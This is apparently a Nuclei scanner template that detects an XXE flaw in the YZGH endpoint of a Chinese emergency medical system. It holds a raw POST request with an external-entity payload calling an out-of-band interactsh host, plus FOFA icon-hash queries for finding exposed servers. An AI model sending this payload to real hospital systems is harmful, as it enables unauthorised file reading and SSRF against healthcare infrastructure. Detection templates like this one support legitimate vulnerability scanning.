http:
    - matchers:
        - part: interactsh_protocol
          type: word
          words:
            - dns
      raw:
        - |
          POST /AppService/BQMedical/WebServiceForFirstaidApp.asmx/YZGH HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
          Content-Type: application/x-www-form-urlencoded

          requestXml=<?xml version="1.0" encoding="UTF-8"?>
          <!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://{{interactsh-url}}"> %remote;]>
id: bianque-YZGH-XXE
info:
    author: Superhero
    description: |-
        fofa: icon_hash="-757866684" || icon_hash="-1206146847"
        扁鹊飞救智能急救与质控系统 YZGH 接口处存在XML实体注入漏洞，攻击者可利用xxe漏洞获取服务器敏感数据，可读取任意文件以及ssrf攻击，存在一定的安全隐患。
    name: 扁鹊飞救智能急救与质控系统 YZGH XML实体注入漏洞
    reference:
        - https://mp.weixin.qq.com/s/1x2guIYLnXaq4MYi94rw0g
    severity: high
    tags:
        - XXE
        - AppServ
        - appserv
        - 扁鹊飞救智能急救与质控系统
